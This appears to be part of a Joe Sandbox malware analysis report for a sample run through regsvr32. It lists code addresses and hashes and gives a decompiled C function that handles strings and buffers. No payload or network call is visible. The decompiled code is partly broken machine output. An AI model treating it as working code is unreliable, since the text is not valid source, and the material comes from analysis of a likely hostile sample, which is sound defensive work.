0x0046b8ce
0x0046b8d0
0x0046b8dd
0x0046b8df
0x0046b8e1
0x0046bd6c
0x0046bd78
0x0046bd84
0x0046bd90
0x0046bd9c
0x0046bda8
0x0046bdb4
0x0046bdc0
0x0046bdc5
0x0046bdd3
0x0046b8e7
0x0046b8e7
0x0046b8e8
0x0046b8eb
0x00000000
0x0046b8f1
0x0046b8f8
0x0046b904
0x0046b910
0x0046b91c
0x0046b928
0x0046b934
0x0046b940
0x0046b94c
0x0046b951
0x0046b95f
0x0046b95f
0x0046b8eb
0x00000000
0x0046b8e1
0x0046b962
0x0046b969
0x0046b969
0x0046b96b
0x0046b972
0x0046b979
0x0046b980
0x0046b980
0x0046b985
0x0046b98c
0x0046b993
0x0046b994
0x0046b99c
0x0046b9a8
0x0046b9aa
0x00000000
0x00000000
0x0046b9bc
0x0046b9be
0x0046b9cb
0x0046b9cd
0x0046b9cf
0x0046bddd
0x0046bde9
0x0046bdf5
0x0046be01
0x0046be0d
0x0046be19
0x0046be25
0x0046be31
0x0046be36
0x0046be44
0x0046b9d5
0x0046b9d5
0x0046b9d6
0x0046b9d9
0x00000000
0x0046b9db
0x0046b9e2
0x0046b9ee
0x0046b9fa
0x0046ba06
0x0046ba12
0x0046ba1e
0x0046ba2a
0x0046ba36
0x0046ba3b
0x0046ba49
0x0046ba49
0x0046b9d9
0x00000000
0x0046b9cf
0x0046be47
0x0046be58
0x0046be5c
0x0046be5d
0x0046be61
0x0046be65
0x0046be6b
0x0046be6f
0x0046be75
0x0046be79
0x0046be7d
0x0046be82
0x0046be89
0x0046be8c
0x0046be91
0x0046be99
0x0046be9d
0x0046bea2
0x0046bea4
0x0046c73a
0x0046c746
0x0046c752
0x0046c75e
0x0046c76a
0x0046c776
0x0046c782
0x0046c78e
0x0046c793
0x0046c7a1
0x0046beaa
0x0046beaa
0x0046beac
0x0046beb0
0x0046beb4
0x0046bebb
0x0046bebf
0x0046bec6
0x0046bec6
0x0046bec6
0x0046becf
0x0046bed4
0x0046bed8
0x0046bee0
0x0046beeb
0x0046bef4
0x0046bef8
0x0046befe
0x0046bf02
0x0046bf06
0x0046bf0c
0x0046bf12
0x0046bf18
0x0046bf1d
0x0046bf1f
0x00000000
0x00000000
0x0046bf21
0x0046bf21
0x0046bf23
0x0046bf2a
0x0046bf2f
0x0046bf33
0x0046bf33
0x0046bf35
0x00000000
0x00000000
0x0046bf3b
0x0046bf3e
0x0046bfde
0x0046bfe3
0x0046bf44
0x0046bf49
0x0046bf4e
0x00000000
0x0046bf4e
0x0046bfea
0x0046bffc
0x0046bffe
0x0046c08e
0x0046c09a
0x0046c0a6
0x0046c0b2
0x0046c0be
0x0046c0ca
0x0046c0d6
0x0046c0e2
0x0046c0e7
0x0046c0f5
0x0046c004
0x0046c008
0x0046c009
0x0046c00d
0x0046c010
0x00000000
0x0046c016
0x0046c01d
0x0046c029
0x0046c035
0x0046c041
0x0046c04d
0x0046c059
0x0046c065
0x0046c071
0x0046c076
0x0046c084
0x0046c084
0x0046c010
0x00000000
0x0046bffe
0x0046c0f8
0x0046c0ff
0x00000000
0x0046c0ff
0x0046bf51
0x0046bf58
0x0046bf5a
0x0046bf61
0x0046bf68
0x0046bf6c
0x0046bf75
0x0046bf7a
0x0046bf88
0x0046bf89
0x0046bf8d
0x0046bf94
0x0046bf95
0x0046bf96
0x0046bfa4
0x0046bfa6
0x00000000
0x00000000
0x0046bfac
0x0046bfac
0x0046bfae
0x0046bfba
0x0046bfbc
0x0046bfc0
0x0046bfc2
0x00000000
0x00000000
0x0046bfc8
0x0046bfcb
0x0046c106
0x0046c10b
0x0046bfd1
0x0046bfd6
0x0046bfdb
0x00000000
0x0046bfdb
0x00000000
0x0046bfcb
0x0046c118
0x0046c11a
0x0046c11c
0x0046c1ac
0x0046c1b8
0x0046c1c4
0x0046c1d0
0x0046c1dc
0x0046c1e8
0x0046c1f4
0x0046c200
0x0046c205
0x0046c213
0x0046c122
0x0046c126
0x0046c127
0x0046c12b
0x0046c12e
0x00000000
0x0046c134
0x0046c13b
0x0046c147
0x0046c153
0x0046c15f
0x0046c16b
0x0046c177
0x0046c183
0x0046c18f
0x0046c194
0x0046c1a2
0x0046c1a2
0x0046c12e
0x00000000
0x0046c11c
0x0046c216
0x0046c21d
0x0046c221
0x0046c227
0x0046c236
0x0046c23a
0x0046c23f
0x0046c241
0x0046c2b4
0x0046c2ba
0x0046c2bf
0x0046c2cf
0x0046c2e8
0x0046c2f1
0x0046c2fd
0x0046c309
0x0046c311
0x0046c314
0x0046c317
0x0046c328
0x0046c32d
0x0046c32f
0x0046c333
0x0046c33a
0x0046c341
0x0046c347
0x0046c357
0x0046c358
0x0046c35f
0x0046c366
0x0046c367
0x0046c368
0x0046c371
0x0046c376
0x0046c378
0x00000000
0x00000000
0x0046c37e
0x0046c37e
0x0046c380
0x0046c38c
0x0046c38e
0x0046c392
0x0046c394
0x00000000
0x00000000
0x0046c396
0x0046c399
0x0046c3a8
0x0046c3ad
0x0046c39b
0x0046c3a0
0x0046c3a5
0x00000000
0x0046c3a5
0x00000000
0x0046c399
0x0046c3ba
0x0046c3bc
0x0046c3be
0x0046c454
0x0046c460
0x0046c46c
0x0046c478
0x0046c484
0x0046c490
0x0046c49c
0x0046c4a8
0x0046c4b4
0x0046c4b9
0x0046c4c7
0x0046c3c4
0x0046c3c8
0x0046c3c9
0x0046c3cd
0x0046c3d0
0x00000000
0x0046c3d6
0x0046c3da
0x0046c3e6
0x0046c3f2
0x0046c3fe
0x0046c40a
0x0046c416
0x0046c422
0x0046c42e
0x0046c43a
0x0046c43f
0x0046c44d
0x0046c44d
0x0046c3d0
0x00000000
0x0046c3be
0x0046c4ca
0x0046c4d1
0x0046c4d1
0x0046c4d3
0x0046c4da
0x0046c4e1
0x0046c4e3
0x0046c4e3
0x0046c4ec
0x0046c4f1
0x0046c4f5
0x0046c4fd
0x0046c501
0x0046c50c
0x0046c517
0x0046c51b
0x0046c522
0x0046c526
0x0046c52d
0x0046c531
0x0046c537
0x0046c53d
0x0046c542
0x0046c544
0x00000000
0x00000000
0x0046c5f3
0x0046c5f3
0x0046c5f5
0x0046c5fc
0x0046c603
0x0046c605
0x00000000
0x00000000
0x0046c607
0x0046c60a
0x0046c619
0x0046c61e
0x0046c60c
0x0046c611
0x0046c616
0x00000000
0x0046c616
0x00000000
0x0046c60a
0x0046c62b
0x0046c62d
0x0046c62d
0x0046c62f
0x0046c6bd
0x0046c6c9
0x0046c6d5
0x0046c6e1
0x0046c6ed
0x0046c6f9
0x0046c705
0x0046c711
0x0046c71d
0x0046c722
0x0046c730
0x0046c635
0x0046c635
0x0046c636
0x0046c639
0x00000000
0x0046c63f
0x0046c643
0x0046c64f
0x0046c65b
0x0046c667
0x0046c673
0x0046c67f
0x0046c68b
0x0046c697
0x0046c6a3
0x0046c6a8
0x0046c6b6
0x0046c6b6
0x0046c639
0x00000000
0x0046c62f
0x0046c54a
0x0046c54c
0x0046c553
0x0046c558
0x0046c55b
0x0046c56e
0x0046c577
0x0046c583
0x0046c58f
0x0046c59b
0x0046c5a7
0x0046c5b3
0x0046c5bf
0x0046c5cb
0x0046c5d7
0x0046c5de
0x0046c5e1
0x0046c5e1
0x0046c5f0
0x0046c243
0x0046c24a
0x0046c256
0x0046c262
0x0046c26e
0x0046c27a
0x0046c286
0x0046c292
0x0046c29e
0x0046c2a3
0x0046c2b1
0x0046c2b1
0x0046c241
0x0046bea4
0x0046b83c
0x00000000
0x00000000
0x00000000
0x0046b317
0x0046b004
0x0046b00b
0x0046b017
0x0046b023
0x0046b036
0x0046b036
0x00000000

Strings

ZFhj, xrefs: 0046B588

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: ZFhj
API String ID: 0-4053837889
Opcode ID: bc3dddcc2cdf079ee7c9edd93251ef5f0983e37e7b8170a7ef7c34f57f470023
Instruction ID: 5439dc1c3a35c5b906e541e553d13c1da487ee02a50165ac8455db52116db71e
Opcode Fuzzy Hash: bc3dddcc2cdf079ee7c9edd93251ef5f0983e37e7b8170a7ef7c34f57f470023
Instruction Fuzzy Hash: 3AE25E325187809AC335FB75D892AEFB3E4BFA5318F044E2EE08A52191FF346944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00483EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00483EC0(signed int __ecx) {
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t368;
				unsigned int _t371;
				void* _t376;
				signed int* _t377;
				char* _t378;
				char _t381;
				signed int _t382;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t396;
				char* _t397;
				char _t400;
				char _t403;
				signed int _t404;
				signed int _t407;
				signed int _t410;
				signed int _t412;
				void* _t413;
				char* _t416;
				signed int _t418;
				unsigned int _t424;
				signed int _t425;
				char* _t431;
				signed int _t436;
				unsigned int _t442;
				char* _t445;
				void* _t447;
				char _t449;
				signed int _t450;
				signed int _t451;
				char* _t463;
				char _t477;
				char _t479;
				char _t481;
				char _t482;
				signed int _t483;
				signed int _t484;
				char _t491;
				signed int _t492;
				void* _t503;
				signed int _t508;
				unsigned int _t509;
				signed int _t511;
				signed int _t512;
				signed int _t520;
				char* _t521;
				char* _t522;
				char* _t523;
				signed int _t524;
				signed int _t527;
				char* _t535;
				signed int _t537;
				unsigned int _t543;
				signed int _t545;
				signed int _t546;
				char _t548;
				char _t549;
				char _t550;
				signed int _t551;
				signed int _t552;
				unsigned int _t556;
				void* _t565;
				signed int _t566;
				char* _t568;
				char _t569;
				char _t570;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				unsigned int _t575;
				char* _t576;
				char _t577;
				char _t578;
				char* _t583;
				char _t584;
				char _t585;
				signed int _t586;
				unsigned int _t592;
				void* _t595;
				signed int _t597;
				signed int _t600;
				char _t602;
				void* _t603;
				unsigned int _t604;
				signed int _t605;
				unsigned int _t610;
				signed int _t612;
				signed int _t614;
				char* _t615;
				char _t616;
				char _t617;
				char _t620;
				signed int _t621;
				void* _t624;
				signed int _t626;
				char _t629;
				signed int _t630;
				signed int _t636;
				signed int _t641;
				char* _t642;
				char _t644;
				signed int _t646;
				char _t649;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t655;
				signed int _t658;
				char* _t659;
				void* _t660;
				void* _t665;
				intOrPtr _t667;
				signed int _t672;
				signed int _t673;
				unsigned int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				unsigned int* _t683;
				signed int _t685;
				signed int _t686;
				void* _t688;
				signed int _t689;
				signed int _t693;
				signed int _t694;
				char* _t695;
				void* _t696;
				unsigned int _t697;
				signed int _t700;
				unsigned int _t702;
				signed int _t704;
				intOrPtr* _t705;
				signed int _t707;
				signed int _t714;
				void* _t720;
				signed int _t721;
				void* _t723;
				void* _t727;

				_t723 = (_t721 & 0xfffffff0) - 0x44;
				_t505 = __ecx;
				_t727 =  *__ecx;
				if(_t727 == 0) {
					return __ecx;
				} else {
					if(_t727 <= 0) {
						_v48 = 0;
						_t604 = 0;
						if( &_v52 == __ecx) {
							goto L288;
						} else {
							goto L287;
						}
					} else {
						_v64 = 0;
						asm("pxor xmm0, xmm0");
						_v40 = __ecx;
						do {
							_t410 = _v64 + 1;
							_t620 =  *0x49a24c; // 0xa0d0920
							_t550 =  *0x49a250; // 0x0
							_v64 = _t410;
							_v36 = _t620;
							_v32 = _t550;
							_t621 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t410 * 4 - 4));
							if(_t621 == 0) {
								_t680 = 0;
								_t412 = 0;
							} else {
								_t505 = _t621 & 0x0000000f;
								if(_t505 == 0) {
									L8:
									asm("pxor xmm1, xmm1");
									_t503 =  ~( ~_t505 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+ebx]");
										asm("pcmpeqb xmm0, xmm1");
										asm("pmovmskb ecx, xmm0");
										if(_t550 != 0) {
											break;
										}
										_t505 = _t505 + 0x10;
										if(_t505 < _t503) {
											continue;
										} else {
											if(_t503 >= 0x7fffffff) {
												L14:
												_t412 = 0x7fffffff;
												goto L15;
											} else {
												while( *((char*)(_t503 + _t621)) != 0) {
													_t503 = _t503 + 1;
													if(_t503 < 0x7fffffff) {
														continue;
													} else {
														goto L14;
													}
													goto L20;
												}
												goto L295;
											}
										}
										goto L20;
									}
									asm("bsf eax, ecx");
									_t412 = _t503 + _t505;
									goto L295;
								} else {
									_t412 = 0;
									_t505 =  ~_t505 + 0x10;
									while( *((char*)(_t412 + _t621)) != 0) {
										_t412 = _t412 + 1;
										if(_t412 < _t505) {
											continue;
										} else {
											goto L8;
										}
										goto L20;
									}
									L295:
									if(_t412 > 0) {
										L15:
										_t505 = _v36;
										_t680 = 0;
										while(_t505 != 0) {
											while(1) {
												_t720 = _t720 + 1;
												if(_t603 ==  *((intOrPtr*)(_t723 + _t720 + 0x2f))) {
													break;
												}
												if( *((char*)(_t723 + _t720 + 0x30)) != 0) {
													continue;
												}
												goto L20;
											}
											_t680 = _t680 + 1;
											if(_t680 < _t412) {
												continue;
											} else {
												goto L20;
											}
											goto L301;
										}
									} else {
										_t680 = 0;
									}
								}
							}
							L20:
							_t413 = _t412 - 1;
							_t700 = _t412 - _t680;
							if(_t413 >= _t680) {
								_v60 = 0;
								_t505 = _t413 - _t680 + 1;
								_v56 = _t680;
								_t602 = _v36;
								_t689 = _v60;
								_v48 = _t621;
								_v52 = _t505;
								while(_t602 != 0) {
									_t667 =  *((intOrPtr*)(_t413 + _v48));
									while(1) {
										_t505 = 1;
										if(_t667 ==  *((intOrPtr*)(_t723 + 0x30))) {
											break;
										}
										if( *((char*)(_t723 + 0x31)) != 0) {
											continue;
										}
										goto L26;
									}
									_t689 = _t689 + 1;
									_t413 = _t413 - 1;
									_t700 = _t700 - 1;
									if(_t689 < _v52) {
										continue;
									} else {
										break;
									}
									goto L301;
								}
								L26:
								_t621 = _v48;
								_t680 = _v56;
							}
							if(_t700 == 0) {
								L66:
								_push(0x40);
								_t505 = E00471030();
								_t723 = _t723 + 4;
								 *_t505 = 0;
							} else {
								if(_t621 == 0) {
									_t483 = 0;
								} else {
									_t600 = _t621 & 0x0000000f;
									if(_t600 == 0) {
										L33:
										asm("pxor xmm1, xmm1");
										_t483 =  ~( ~_t600 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [edx+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ebx, xmm0");
											if(_t505 != 0) {
												break;
											}
											_t600 = _t600 + 0x10;
											if(_t600 < _t483) {
												continue;
											} else {
												if(_t483 >= 0x7fffffff) {
													L39:
													_t483 = 0x7fffffff;
												} else {
													while( *((char*)(_t483 + _t621)) != 0) {
														_t483 = _t483 + 1;
														if(_t483 < 0x7fffffff) {
															continue;
														} else {
															goto L39;
														}
														goto L40;
													}
												}
											}
											goto L40;
										}
										asm("bsf eax, ebx");
										_t483 = _t483 + _t600;
									} else {
										_t483 = 0;
										_t600 =  ~_t600 + 0x10;
										while( *((char*)(_t483 + _t621)) != 0) {
											_t483 = _t483 + 1;
											if(_t483 < _t600) {
												continue;
											} else {
												goto L33;
											}
											goto L40;
										}
									}
								}
								L40:
								_t687 =  <=  ? 0 : _t680;
								_t688 =  <  ? _t483 :  <=  ? 0 : _t680;
								_t484 = _t483 - _t688;
								if(_t700 < 0 || _t700 > _t484) {
									_t700 = _t484;
								}
								if(_t688 + _t621 == 0 ||  *(_t621 + _t688) == 0) {
									goto L66;
								} else {
									if(_t700 == 0) {
										_t492 = _t621 + _t688;
										_t597 = _t492 & 0x0000000f;
										if(_t597 == 0) {
											L50:
											asm("pxor xmm1, xmm1");
											_t700 =  ~( ~_t597 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm0, [eax+ecx]");
												asm("pcmpeqb xmm0, xmm1");
												asm("pmovmskb ebx, xmm0");
												if(_t505 != 0) {
													break;
												}
												_t597 = _t597 + 0x10;
												if(_t597 < _t700) {
													continue;
												} else {
													if(_t700 >= 0x7fffffff) {
														L56:
														_t700 = 0x7fffffff;
													} else {
														while( *((char*)(_t700 + _t492)) != 0) {
															_t700 = _t700 + 1;
															if(_t700 < 0x7fffffff) {
																continue;
															} else {
																goto L56;
															}
															goto L57;
														}
													}
												}
												goto L57;
											}
											asm("bsf esi, ebx");
											_t700 = _t700 + _t597;
										} else {
											_t700 = 0;
											_t597 =  ~_t597 + 0x10;
											while( *((char*)(_t700 + _t492)) != 0) {
												_t700 = _t700 + 1;
												if(_t700 < _t597) {
													continue;
												} else {
													goto L50;
												}
												goto L57;
											}
										}
									}
									L57:
									_t40 = _t700 + 1; // -2147483661
									_t511 =  <=  ? 0x40 : _t40;
									if(_t511 > 0) {
										_t592 = (_t511 >> 5 >> 0x1a) + _t511 >> 6;
										_t512 = _t511 & 0x8000003f;
										if(_t512 < 0) {
											_t512 = (_t512 - 0x00000001 | 0xffffffc0) + 1;
										}
										_push(_t592 + (0 | _t512 > 0x00000000) << 6);
										_v48 = _t621;
										_t505 = E00471030();
										_t723 = _t723 + 4;
										_t665 = _v48 + _t688;
										_t595 = 0;
										 *_t505 = 0;
										while(1) {
											_t595 = _t595 + 1;
											_t491 =  *((char*)(_t595 + _t665 - 1));
											 *((char*)(_t595 + _t505 - 1)) = _t491;
											if(_t700 != 0 && _t595 == _t700) {
												break;
											}
											if(_t491 != 0) {
												continue;
											} else {
											}
											goto L67;
										}
										 *((char*)(_t595 + _t505)) = 0;
									} else {
										_t505 = 0;
									}
								}
							}
							L67:
							_t551 = _v64;
							_t681 =  *((intOrPtr*)( *((intOrPtr*)(_v40 + 4)) + _t551 * 4 - 4));
							_t416 =  *_t681;
							if(_t416 != _t505) {
								if(_t505 == 0 ||  *_t505 == 0) {
									if(_t416 != 0) {
										 *_t416 = 0;
									}
									if( *(_t681 + 4) < 0x40) {
										_push(0x40);
										_v72 = E00471030();
										_t723 = _t723 + 4;
										_t463 =  *_t681;
										if(_t463 == 0) {
											 *_v72 = 0;
										} else {
											if(_v72 != 0) {
												_t583 = _v72;
												_t649 =  *_t463;
												 *_t583 = _t649;
												if(_t649 != 0) {
													_v84 = _t505;
													_t650 = 0;
													_t523 = _t583;
													while(1) {
														_t650 = _t650 + 1;
														_t584 =  *((char*)(_t463 + _t650 * 2 - 1));
														 *((char*)(_t523 + _t650 * 2 - 1)) = _t584;
														if(_t584 == 0) {
															break;
														}
														_t585 =  *((char*)(_t463 + _t650 * 2));
														 *((char*)(_t523 + _t650 * 2)) = _t585;
														if(_t585 != 0) {
															continue;
														}
														break;
													}
													_t505 = _v84;
												}
												_t463 =  *_t681;
											}
											_push(1);
											_push(_t463);
											E004710B0();
											_t723 = _t723 + 8;
										}
										 *_t681 = _v72;
										 *(_t681 + 4) = 0x40;
									}
								} else {
									_t652 = _t505 & 0x0000000f;
									if(_t652 == 0) {
										L74:
										asm("pxor xmm1, xmm1");
										_t714 =  ~( ~_t652 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+edx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ecx, xmm0");
											if(_t551 != 0) {
												break;
											}
											_t652 = _t652 + 0x10;
											if(_t652 < _t714) {
												continue;
											} else {
												if(_t714 >= 0x7fffffff) {
													L80:
													_t714 = 0x7fffffff;
												} else {
													while( *((char*)(_t714 + _t505)) != 0) {
														_t714 = _t714 + 1;
														if(_t714 < 0x7fffffff) {
															continue;
														} else {
															goto L80;
														}
														goto L81;
													}
													goto L270;
												}
											}
											goto L81;
										}
										asm("bsf esi, ecx");
										_t714 = _t714 + _t652;
										goto L270;
									} else {
										_t714 = 0;
										_t652 =  ~_t652 + 0x10;
										while( *((char*)(_t714 + _t505)) != 0) {
											_t714 = _t714 + 1;
											if(_t714 < _t652) {
												continue;
											} else {
												goto L74;
											}
											goto L81;
										}
										L270:
										if(_t714 == 0xffffffff && _t416 != 0) {
											 *_t416 = 0;
										}
									}
									L81:
									_t57 = _t714 + 1; // -2147483661
									_t654 =  <=  ? 0x40 : _t57;
									if(_t654 >  *(_t681 + 4)) {
										_v68 = (_t654 >> 5 >> 0x1a) + _t654 >> 6;
										_t655 = _t654 & 0x8000003f;
										if(_t655 < 0) {
											_t655 = (_t655 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t658 = _v68 + (0 | _t655 > 0x00000000) << 6;
										_v68 = _t658;
										_push(_t658);
										_t586 = E00471030();
										_t723 = _t723 + 4;
										_t659 =  *_t681;
										if(_t659 == 0) {
											 *_t586 = 0;
										} else {
											if(_t586 != 0) {
												_t479 =  *_t659;
												 *_t586 = _t479;
												if(_t479 != 0) {
													_v80 = _t681;
													_v84 = _t505;
													_t524 = 0;
													while(1) {
														_t524 = _t524 + 1;
														_t481 =  *((char*)(_t659 + _t524 * 2 - 1));
														 *((char*)(_t586 + _t524 * 2 - 1)) = _t481;
														if(_t481 == 0) {
															break;
														}
														_t482 =  *((char*)(_t659 + _t524 * 2));
														 *((char*)(_t586 + _t524 * 2)) = _t482;
														if(_t482 != 0) {
															continue;
														}
														break;
													}
													_t681 = _v80;
													_t505 = _v84;
												}
												_t659 =  *_t681;
											}
											_push(1);
											_push(_t659);
											_v76 = _t586;
											E004710B0();
											_t586 = _v76;
											_t723 = _t723 + 8;
										}
										 *(_t681 + 4) = _v68;
										 *_t681 = _t586;
									} else {
										_t586 =  *_t681;
									}
									if(_t586 != 0 && _t505 != 0) {
										_t660 = 0;
										while(1) {
											_t660 = _t660 + 1;
											_t477 =  *((char*)(_t660 + _t505 - 1));
											 *((char*)(_t660 + _t586 - 1)) = _t477;
											if(_t714 != 0 && _t660 == _t714) {
												break;
											}
											if(_t477 != 0) {
												continue;
											} else {
											}
											goto L117;
										}
										 *((char*)(_t660 + _t586)) = 0;
									}
								}
							}
							L117:
							_push(1);
							_push(_t505);
							E004710B0();
							_t723 = _t723 + 8;
							_t418 = _v40;
							_t552 =  *_t418;
						} while (_t552 > _v64);
						_t505 = _t418;
						_t604 = 0;
						_v48 = 0;
						asm("pxor xmm0, xmm0");
						if(_t552 <= 0) {
							if( &_v52 == _t505) {
								L288:
								_v52 = _t604;
								_v44 = _t604;
							} else {
								L287:
								_v44 = _t604;
								_v52 = _t604;
								 *_t505 = _t604;
								 *(_t505 + 8) = _t604;
								goto L196;
							}
						} else {
							_t371 = 0;
							_v44 = 0;
							_t682 = 0;
							_v60 = _t552;
							_v40 = _t505;
							do {
								_t682 = _t682 + 1;
								_t520 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t682 * 4 - 4));
								if(_t520 != 0) {
									_t704 = _t520 & 0x0000000f;
									if(_t704 == 0) {
										L125:
										asm("pxor xmm1, xmm1");
										_v56 = _t682;
										_t565 =  ~( ~_t704 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+esi]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb edi, xmm0");
											if(_t682 != 0) {
												break;
											}
											_t704 = _t704 + 0x10;
											if(_t704 < _t565) {
												continue;
											} else {
												_t682 = _v56;
												if(_t565 >= 0x7fffffff) {
													goto L131;
												} else {
													while( *((char*)(_t565 + _t520)) != 0) {
														_t565 = _t565 + 1;
														if(_t565 < 0x7fffffff) {
															continue;
														} else {
															goto L131;
														}
														goto L182;
													}
													goto L284;
												}
											}
											goto L182;
										}
										_t566 = _t682;
										asm("bsf ecx, ecx");
										_t682 = _v56;
										_t565 = _t566 + _t704;
										goto L284;
									} else {
										_t565 = 0;
										_t704 =  ~_t704 + 0x10;
										while( *((char*)(_t565 + _t520)) != 0) {
											_t565 = _t565 + 1;
											if(_t565 < _t704) {
												continue;
											} else {
												goto L125;
											}
											goto L182;
										}
										L284:
										if(_t565 != 0) {
											L131:
											_v52 = _t604;
											_t624 =  >  ? _t371 : 0;
											_t625 =  >=  ? _t371 : _t624;
											_v64 =  >=  ? _t371 : _t624;
											_t626 = _v44;
											if(_t371 == _t626) {
												_v44 = _t626 + 4;
												_push(0x10 + _t626 * 4);
												_t707 = E00471030();
												E00470C10(_t707, _v48, _v52 << 2);
												_push(4);
												_push(_v48);
												E004710B0();
												_t723 = _t723 + 0x18;
												_v48 = _t707;
												_t371 = _v52;
											}
											_t419 = _t371 != _v64;
											if(_t371 != _v64) {
												E00470BC0(_v48 + _v64 * 4 + 4, _v48 + _v64 * 4, _t419 << 2);
												_t723 = _t723 + 0xc;
											}
											_push(8);
											_t705 = E00471030();
											_t723 = _t723 + 4;
											if(_t705 == 0) {
												_t705 = 0;
											} else {
												 *_t705 = 0;
												 *(_t705 + 4) = 0;
												if(_t520 == 0 ||  *_t520 == 0) {
													_push(0x40);
													_v80 = E00471030();
													_t723 = _t723 + 4;
													_t431 =  *_t705;
													if(_t431 == 0) {
														 *_v80 = 0;
													} else {
														if(_v80 != 0) {
															_t568 = _v80;
															_t629 =  *_t431;
															 *_t568 = _t629;
															if(_t629 != 0) {
																_v56 = _t682;
																_t630 = 0;
																_t521 = _t568;
																while(1) {
																	_t630 = _t630 + 1;
																	_t569 =  *((char*)(_t431 + _t630 * 2 - 1));
																	 *((char*)(_t521 + _t630 * 2 - 1)) = _t569;
																	if(_t569 == 0) {
																		break;
																	}
																	_t570 =  *((char*)(_t431 + _t630 * 2));
																	 *((char*)(_t521 + _t630 * 2)) = _t570;
																	if(_t570 != 0) {
																		continue;
																	}
																	break;
																}
																_t682 = _v56;
															}
														}
														_push(1);
														_push(_t431);
														E004710B0();
														_t723 = _t723 + 8;
													}
													 *_t705 = _v80;
													 *(_t705 + 4) = 0x40;
												} else {
													_t436 = _t520 & 0x0000000f;
													if(_t436 == 0) {
														L142:
														asm("pxor xmm1, xmm1");
														_t636 =  ~( ~_t436 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v72 = _t636;
														_t571 = _t636;
														while(1) {
															asm("movdqu xmm0, [ebx+eax]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb edx, xmm0");
															if(_t636 != 0) {
																break;
															}
															_t436 = _t436 + 0x10;
															if(_t436 < _t571) {
																continue;
															} else {
																_v72 = _t571;
																if(_v72 >= 0x7fffffff) {
																	L149:
																	_v72 = 0x7fffffff;
																} else {
																	_t451 = _t571;
																	while( *((char*)(_t451 + _t520)) != 0) {
																		_t451 = _t451 + 1;
																		if(_t451 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L149;
																		}
																		goto L150;
																	}
																	_v72 = _t451;
																}
															}
															goto L150;
														}
														asm("bsf edx, edx");
														_v72 = _t636 + _t436;
													} else {
														_v72 = 0;
														_t646 = _v72;
														_t436 =  ~_t436 + 0x10;
														while( *((char*)(_t646 + _t520)) != 0) {
															_t646 = _t646 + 1;
															if(_t646 < _t436) {
																continue;
															} else {
																goto L142;
															}
															goto L150;
														}
														_v72 = _t646;
													}
													L150:
													_t143 = _v72 + 1; // 0x80000000
													_t573 =  <=  ? 0x40 : _t143;
													if(_t573 > 0) {
														_t442 = (_t573 >> 5 >> 0x1a) + _t573 >> 6;
														_v76 = _t442;
														_t574 = _t573 & 0x8000003f;
														if(_t574 < 0) {
															_t574 = (_t574 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t641 = _t442 + (0 | _t574 > 0x00000000) << 6;
														_v76 = _t641;
														_push(_t641);
														_t445 = E00471030();
														_v68 = _t445;
														_t723 = _t723 + 4;
														_t642 =  *_t705;
														if(_t642 == 0) {
															 *_t445 = 0;
														} else {
															if(_v68 != 0) {
																_t576 = _t445;
																_t449 =  *_t642;
																 *_t576 = _t449;
																if(_t449 != 0) {
																	_v84 = _t520;
																	_t450 = 0;
																	_v56 = _t682;
																	_t522 = _t576;
																	while(1) {
																		_t450 = _t450 + 1;
																		_t577 =  *((char*)(_t642 + _t450 * 2 - 1));
																		 *((char*)(_t522 + _t450 * 2 - 1)) = _t577;
																		if(_t577 == 0) {
																			break;
																		}
																		_t578 =  *((char*)(_t642 + _t450 * 2));
																		 *((char*)(_t522 + _t450 * 2)) = _t578;
																		if(_t578 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t520 = _v84;
																	_t682 = _v56;
																}
															}
															_push(1);
															_push(_t642);
															E004710B0();
															_t723 = _t723 + 8;
														}
														 *(_t705 + 4) = _v76;
														 *_t705 = _v68;
													} else {
														_v68 = 0;
													}
													if(_v68 != 0) {
														_v56 = _t682;
														_t447 = 0;
														_t575 = _v68;
														_t686 = _v72;
														while(1) {
															_t447 = _t447 + 1;
															_t644 =  *((char*)(_t447 + _t520 - 1));
															 *((char*)(_t447 + _t575 - 1)) = _t644;
															if(_t686 != 0 && _t447 == _t686) {
																break;
															}
															if(_t644 != 0) {
																continue;
															} else {
																_t682 = _v56;
															}
															goto L181;
														}
														_t682 = _v56;
														 *((char*)(_t447 + _v68)) = 0;
													}
												}
											}
											L181:
											 *((intOrPtr*)(_v48 + _v64 * 4)) = _t705;
											_t371 = _v52 + 1;
											_v60 =  *_v40;
											_t604 = _t371;
										} else {
										}
									}
								}
								L182:
							} while (_t682 < _v60);
							_t505 = _v40;
							_t683 =  &_v52;
							_t556 =  *(_t683 - 8);
							if(_t683 == _t505) {
								L253:
